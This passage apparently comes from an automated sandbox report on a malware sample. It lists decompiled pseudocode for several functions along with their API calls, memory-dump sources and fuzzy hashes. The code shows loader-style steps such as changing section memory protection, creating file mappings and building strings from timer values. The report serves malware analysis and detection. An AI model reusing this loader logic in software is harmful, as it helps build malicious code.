                                                                                                                                                                                                                                                                                    								if( *0xa7a2b4 <= 6) {
                                                                                                                                                                                                                                                                                    									_t42 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    									_t15 = _t42 + 0xa7bbda; // 0x52384549
                                                                                                                                                                                                                                                                                    									E00A75EC8(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_t38 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    							_t17 = _t38 + 0xa7bdc8; // 0x5569370
                                                                                                                                                                                                                                                                                    							_t18 = _t38 + 0xa7bda0; // 0x680043
                                                                                                                                                                                                                                                                                    							_t45 = E00A733B7(_v8, 0x80000001, _t55, _t18, _t17);
                                                                                                                                                                                                                                                                                    							HeapFree( *0xa7a290, 0, _t55);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					HeapFree( *0xa7a290, 0, _v16);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t54 = _v8;
                                                                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    					E00A73EFA(_t54);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t45;
                                                                                                                                                                                                                                                                                    			}

















                                                                                                                                                                                                                                                                                    0x00a74ada
                                                                                                                                                                                                                                                                                    0x00a74adc
                                                                                                                                                                                                                                                                                    0x00a74ae3
                                                                                                                                                                                                                                                                                    0x00a74ae5
                                                                                                                                                                                                                                                                                    0x00a74aec
                                                                                                                                                                                                                                                                                    0x00a74af7
                                                                                                                                                                                                                                                                                    0x00a74af7
                                                                                                                                                                                                                                                                                    0x00a74ae3
                                                                                                                                                                                                                                                                                    0x00a74afc
                                                                                                                                                                                                                                                                                    0x00a74b01
                                                                                                                                                                                                                                                                                    0x00a74b08
                                                                                                                                                                                                                                                                                    0x00a74b26
                                                                                                                                                                                                                                                                                    0x00a74b28
                                                                                                                                                                                                                                                                                    0x00a74b28
                                                                                                                                                                                                                                                                                    0x00a74abf
                                                                                                                                                                                                                                                                                    0x00a74b3a
                                                                                                                                                                                                                                                                                    0x00a74b3a
                                                                                                                                                                                                                                                                                    0x00a74b3c
                                                                                                                                                                                                                                                                                    0x00a74b41
                                                                                                                                                                                                                                                                                    0x00a74b43
                                                                                                                                                                                                                                                                                    0x00a74b43
                                                                                                                                                                                                                                                                                    0x00a74b4e

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05569338,00000000,?,73BCF710,00000000,73BCF730), ref: 00A74A8B
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05569370,?,00000000,30314549,00000014,004F0053,0556932C), ref: 00A74B28
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00A71BD5), ref: 00A74B3A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                    • Opcode ID: bdac5b01dbe554f25e64cd8437655188e2c23dfdf1b180b5062960b7e7c2c13f
                                                                                                                                                                                                                                                                                    • Instruction ID: e20055a5143454d821f0f2019c29c4955219730ff111f3896414cab1ca55a1c4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdac5b01dbe554f25e64cd8437655188e2c23dfdf1b180b5062960b7e7c2c13f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B316C72900208BEEB21DBD4DD85EAE7BBCEF88300F15C095F50DA7062D771AE459BA0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                                                                                                                                    			E00A7243C(intOrPtr* __eax, void* __ecx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                                    				intOrPtr _t22;
                                                                                                                                                                                                                                                                                    				long _t29;
                                                                                                                                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t41;
                                                                                                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t47;
                                                                                                                                                                                                                                                                                    				void* _t48;
                                                                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t42 = __ecx;
                                                                                                                                                                                                                                                                                    				_t41 = _a16;
                                                                                                                                                                                                                                                                                    				_t47 = __eax;
                                                                                                                                                                                                                                                                                    				_t22 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    				_t2 = _t22 + 0xa7b671; // 0x657a6973
                                                                                                                                                                                                                                                                                    				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
                                                                                                                                                                                                                                                                                    				if( *0xa7a2a4 >= 5) {
                                                                                                                                                                                                                                                                                    					_push( &_a16);
                                                                                                                                                                                                                                                                                    					_push( &_v8);
                                                                                                                                                                                                                                                                                    					_push( &_v48);
                                                                                                                                                                                                                                                                                    					_t29 = _a4;
                                                                                                                                                                                                                                                                                    					"QQSUVWh"();
                                                                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                                                                    					_a4 = _t29;
                                                                                                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                                                                                                    					if(_a4 != 0) {
                                                                                                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                                                                                                    						 *0xa7a2a4 =  *0xa7a2a4 + 1;
                                                                                                                                                                                                                                                                                    						L10:
                                                                                                                                                                                                                                                                                    						return _a4;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t49 = _a16;
                                                                                                                                                                                                                                                                                    					 *_t47 = _a16;
                                                                                                                                                                                                                                                                                    					_t48 = _v8;
                                                                                                                                                                                                                                                                                    					 *_t41 = E00A73F12(_t49, _t48);
                                                                                                                                                                                                                                                                                    					_t33 = E00A745E6(_t46, _t48, _t49);
                                                                                                                                                                                                                                                                                    					if(_t33 != 0) {
                                                                                                                                                                                                                                                                                    						 *_a8 = _t48;
                                                                                                                                                                                                                                                                                    						 *_a12 = _t33;
                                                                                                                                                                                                                                                                                    						if( *0xa7a2a4 < 5) {
                                                                                                                                                                                                                                                                                    							 *0xa7a2a4 =  *0xa7a2a4 & 0x00000000;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_a4 = 0xbf;
                                                                                                                                                                                                                                                                                    					E00A72813();
                                                                                                                                                                                                                                                                                    					HeapFree( *0xa7a290, 0, _t48);
                                                                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t50 =  *0xa7a390; // 0x5568d6c
                                                                                                                                                                                                                                                                                    				if(RtlAllocateHeap( *0xa7a290, 0, 0x800) == 0) {
                                                                                                                                                                                                                                                                                    					_a4 = 8;
                                                                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t29 = E00A76DB7(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
                                                                                                                                                                                                                                                                                    				goto L5;
                                                                                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00A7245E
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A72483
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A76DB7: GetTickCount.KERNEL32 ref: 00A76DCE
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A76DB7: wsprintfA.USER32 ref: 00A76E1B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A76DB7: wsprintfA.USER32 ref: 00A76E38
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A76DB7: wsprintfA.USER32 ref: 00A76E58
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A76DB7: wsprintfA.USER32 ref: 00A76E76
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A76DB7: wsprintfA.USER32 ref: 00A76E99
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A76DB7: wsprintfA.USER32 ref: 00A76EBA
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00A71C1F,?,?,00A71C1F,?), ref: 00A724FD
Memory Dump Source
• Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: wsprintf$Heap$AllocateCountFreeTick
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2794511967-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 566d6cfd904807db44dfd9a4a3bd52415d097d822522b4a1cf54c0ebae0049f8
                                                                                                                                                                                                                                                                                    • Instruction ID: 515bb2133aed9b30dbb80a1a698f1600d6821ccadddbb7439f657b7e1fc55fb3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 566d6cfd904807db44dfd9a4a3bd52415d097d822522b4a1cf54c0ebae0049f8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E312772500109EFCB11DFA4DD84BDE3BB8FB58310F10C022F909AB261D7749A858BA2
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                                                                    			E6E051030(void* __eax, void* _a4) {
                                                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                                                                    				int _t43;
                                                                                                                                                                                                                                                                                    				long _t54;
                                                                                                                                                                                                                                                                                    				signed int _t57;
                                                                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                                                                    				signed int _t60;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                                                                    				_t57 =  *0x6e0541cc;
                                                                                                                                                                                                                                                                                    				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                                                                                                                                                                                                                                                    				_v16 =  *(__eax + 6) & 0x0000ffff;
                                                                                                                                                                                                                                                                                    				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
                                                                                                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                                    				if(_v16 <= 0) {
                                                                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                                                                    					return _v12;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                                                                                    					_t60 = _v12;
                                                                                                                                                                                                                                                                                    					if(_t60 != 0) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                                                                    					if(_t60 >= 0) {
                                                                                                                                                                                                                                                                                    						asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                                                                    						if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                    							L8:
                                                                                                                                                                                                                                                                                    							_t54 = _t57 - 0x63699bbf;
                                                                                                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                                                                                                    							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                                                                                                                                                                                                                                                                    							if(_t43 == 0) {
                                                                                                                                                                                                                                                                                    								_v12 = GetLastError();
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                    							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
                                                                                                                                                                                                                                                                                    							if(_v8 < _v16) {
                                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								goto L12;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                                                                    						_t54 = _t57 - 0x63699bc1;
                                                                                                                                                                                                                                                                                    						if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                                                                    					if(_t60 >= 0) {
                                                                                                                                                                                                                                                                                    						_t54 = _t57 - 0x63699ba3;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t54 = _t57 - 0x63699b83;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6E051069
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E0510DE
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E0510E4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual$ErrorLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1469625949-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 83c3d807fe629c1c15d1bfb45eb02c0423856c4f73e3ef7bbce32ae00f3e88f4
                                                                                                                                                                                                                                                                                    • Instruction ID: 5b767498cca2c9a758986dbc7570da5707bcf5d542afa3c0b51a439388255033
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83c3d807fe629c1c15d1bfb45eb02c0423856c4f73e3ef7bbce32ae00f3e88f4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E217131800706EFCB14CFD5C985AAAF7F5FF08359F008959D00697645E3B8AAA9CF91
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                                                                                                                                                    			E6E0516EC() {
                                                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                                                    				void _v44;
                                                                                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                                                                                    				void* _v52;
                                                                                                                                                                                                                                                                                    				long _t23;
                                                                                                                                                                                                                                                                                    				int _t24;
                                                                                                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t30;
                                                                                                                                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                                                                    				_push(0x6e0541c4);
                                                                                                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                                                                                                    				_push( *0x6e0541d0 + 0x6e055089);
                                                                                                                                                                                                                                                                                    				 *0x6e0541c0 = 0xc;
                                                                                                                                                                                                                                                                                    				 *0x6e0541c8 = 0; // executed
                                                                                                                                                                                                                                                                                    				L6E0514D8(); // executed
                                                                                                                                                                                                                                                                                    				_t34 = 6;
                                                                                                                                                                                                                                                                                    				memset( &_v44, 0, _t34 << 2);
                                                                                                                                                                                                                                                                                    				if(E6E051112( &_v44,  &_v28,  *0x6e0541cc ^ 0xfd7cd1cf) == 0) {
                                                                                                                                                                                                                                                                                    					_t23 = 0xb;
                                                                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                                                                    					ExitThread(_t23);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t24 = lstrlenW( *0x6e0541b8);
                                                                                                                                                                                                                                                                                    				_t7 = _t24 + 2; // 0x2
                                                                                                                                                                                                                                                                                    				_t10 = _t24 + _t7 + 8; // 0xa
                                                                                                                                                                                                                                                                                    				_t28 = E6E051979(_t36, _t10,  &_v48,  &_v52); // executed
                                                                                                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                                                                                                    					_t30 = _v52;
                                                                                                                                                                                                                                                                                    					 *_t30 = 0;
                                                                                                                                                                                                                                                                                    					if( *0x6e0541b8 == 0) {
                                                                                                                                                                                                                                                                                    						 *((short*)(_t30 + 4)) = 0;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						E6E052112(_t40, _t30 + 4);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t23 = E6E051236(_v44); // executed
                                                                                                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6E0541C4,00000000), ref: 6E05171D
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?), ref: 6E051751
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051979: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?,?), ref: 6E051986
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051979: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E05199C
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051979: _snwprintf.NTDLL ref: 6E0519C1
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051979: CreateFileMappingW.KERNELBASE(000000FF,6E0541C0,00000004,00000000,?,?), ref: 6E0519E6
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051979: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?), ref: 6E0519FD
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051979: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A), ref: 6E051A32
                                                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 6E0517A0
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
• Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4209869662-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3b28d90efe12d0de8af38b6498b5b62f89aa5b17bc2361e85a2ac3a7e2322795
                                                                                                                                                                                                                                                                                    • Instruction ID: c01210947d0740676197c76e87fd54ee9d7d1d970e1d7454f3677e6546de2df0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b28d90efe12d0de8af38b6498b5b62f89aa5b17bc2361e85a2ac3a7e2322795
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98118B72104B06AFDB00DFA8CA88EDB7BFCEB55754F00091AF115D7240DB30E9298B95
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 28%
                                                                                                                                                                                                                                                                                    			E00A7274E(void* __ecx, signed char* _a4) {
                                                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                                                                    				signed short _t16;
                                                                                                                                                                                                                                                                                    				signed int _t17;
                                                                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                                                                    				intOrPtr _t20;
                                                                                                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                                                                    				signed short* _t26;
                                                                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t31;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t31 = __imp__;
                                                                                                                                                                                                                                                                                    				_t23 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 1;
                                                                                                                                                                                                                                                                                    				_t28 = 0xa7a380;
                                                                                                                                                                                                                                                                                    				 *_t31(0, _t27, _t30, _t22, __ecx, __ecx);
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_t13 = E00A74E9C(_a4,  &_v12); // executed
                                                                                                                                                                                                                                                                                    					if(_t13 == 0) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_push(_v12);
                                                                                                                                                                                                                                                                                    					_t19 = 0xd;
                                                                                                                                                                                                                                                                                    					_t20 = E00A733FA(_t19);
                                                                                                                                                                                                                                                                                    					if(_t20 == 0) {
                                                                                                                                                                                                                                                                                    						HeapFree( *0xa7a290, 0, _v12);
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						 *_t28 = _t20;
                                                                                                                                                                                                                                                                                    						_t28 = _t28 + 4;
                                                                                                                                                                                                                                                                                    						_t23 = _t23 + 1;
                                                                                                                                                                                                                                                                                    						if(_t23 < 3) {
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                                                                    					 *_t31(1);
                                                                                                                                                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    						_t26 =  *0xa7a388; // 0x5569c50
                                                                                                                                                                                                                                                                                    						_t16 =  *_t26 & 0x0000ffff;
                                                                                                                                                                                                                                                                                    						if(_t16 < 0x61 || _t16 > 0x7a) {
                                                                                                                                                                                                                                                                                    							_t17 = _t16 & 0x0000ffff;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t17 = (_t16 & 0x0000ffff) - 0x20;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						 *_t26 = _t17;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00A7276B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3,00A7A380), ref: 00A74EC7
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00A74EE9
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74E9C: memset.NTDLL ref: 00A74F03
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74E9C: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00A74F41
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74E9C: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00A74F55
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74E9C: FindCloseChangeNotification.KERNELBASE(?), ref: 00A74F6C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74E9C: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00A74F78
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74E9C: lstrcat.KERNEL32(?,642E2A5C), ref: 00A74FB9
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74E9C: FindFirstFileA.KERNELBASE(?,?), ref: 00A74FCF
                                                                                                                                                                                                                                                                                    • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00A727B0
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A733FA: lstrlen.KERNEL32(?,00A7A380,73BB7FC0,00000000,00A72788,?,?,?,?,?,00A73EAC,?), ref: 00A73403
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A733FA: mbstowcs.NTDLL ref: 00A7342A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A733FA: memset.NTDLL ref: 00A7343C
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00A73EAC,?), ref: 00A727A4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Wow64$FileHeap$AllocateEnableFindRedirectionmemset$ChangeCloseCreateFirstFreeNotificationTimelstrcatlstrlenmbstowcs
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1489712272-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d86c97641872ddf925d93f62ae2349f2d94f75eed18ecaa176ed4af2f8b1a783
                                                                                                                                                                                                                                                                                    • Instruction ID: 5c1bf150cfbaa083dbbdd3e63413d865dbe05fa2a8ad543001b573a2de5fd052
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d86c97641872ddf925d93f62ae2349f2d94f75eed18ecaa176ed4af2f8b1a783
